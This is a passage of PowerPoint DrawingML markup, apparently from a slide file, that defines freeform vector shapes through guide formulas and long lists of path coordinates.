                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 15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1"/>
                  <a:gd name="T166" fmla="*/ 0 h 151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 15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1" h="151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A2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165" name="Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
                  <a:gd name="T58" fmla="*/ 0 w 189"/>
                  <a:gd name="T59" fmla="*/ 0 h 125"/>
                  <a:gd name="T60" fmla="*/ 0 w 189"/>
                  <a:gd name="T61" fmla="*/ 0 h 125"/>
                  <a:gd name="T62" fmla="*/ 0 w 189"/>
                  <a:gd name="T63" fmla="*/ 0 h 125"/>
                  <a:gd name="T64" fmla="*/ 0 w 189"/>
                  <a:gd name="T65" fmla="*/ 0 h 125"/>
                  <a:gd name="T66" fmla="*/ 0 w 189"/>
                  <a:gd name="T67" fmla="*/ 0 h 125"/>
                  <a:gd name="T68" fmla="*/ 0 w 189"/>
                  <a:gd name="T69" fmla="*/ 0 h 125"/>
                  <a:gd name="T70" fmla="*/ 0 w 189"/>
                  <a:gd name="T71" fmla="*/ 0 h 125"/>
                  <a:gd name="T72" fmla="*/ 0 w 189"/>
                  <a:gd name="T73" fmla="*/ 0 h 125"/>
                  <a:gd name="T74" fmla="*/ 0 w 189"/>
                  <a:gd name="T75" fmla="*/ 0 h 125"/>
                  <a:gd name="T76" fmla="*/ 0 w 189"/>
                  <a:gd name="T77" fmla="*/ 0 h 125"/>
                  <a:gd name="T78" fmla="*/ 0 w 189"/>
                  <a:gd name="T79" fmla="*/ 0 h 125"/>
                  <a:gd name="T80" fmla="*/ 0 w 189"/>
                  <a:gd name="T81" fmla="*/ 0 h 125"/>
                  <a:gd name="T82" fmla="*/ 0 w 189"/>
                  <a:gd name="T83" fmla="*/ 0 h 125"/>
                  <a:gd name="T84" fmla="*/ 0 w 189"/>
                  <a:gd name="T85" fmla="*/ 0 h 125"/>
                  <a:gd name="T86" fmla="*/ 0 w 189"/>
                  <a:gd name="T87" fmla="*/ 0 h 125"/>
                  <a:gd name="T88" fmla="*/ 0 w 189"/>
                  <a:gd name="T89" fmla="*/ 0 h 125"/>
                  <a:gd name="T90" fmla="*/ 0 w 189"/>
                  <a:gd name="T91" fmla="*/ 0 h 125"/>
                  <a:gd name="T92" fmla="*/ 0 w 189"/>
                  <a:gd name="T93" fmla="*/ 0 h 125"/>
                  <a:gd name="T94" fmla="*/ 0 w 189"/>
                  <a:gd name="T95" fmla="*/ 0 h 125"/>
                  <a:gd name="T96" fmla="*/ 0 w 189"/>
                  <a:gd name="T97" fmla="*/ 0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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 125"/>
                  <a:gd name="T149" fmla="*/ 189 w 189"/>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9" h="125">
                    <a:moveTo>
                      <a:pt x="189" y="93"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
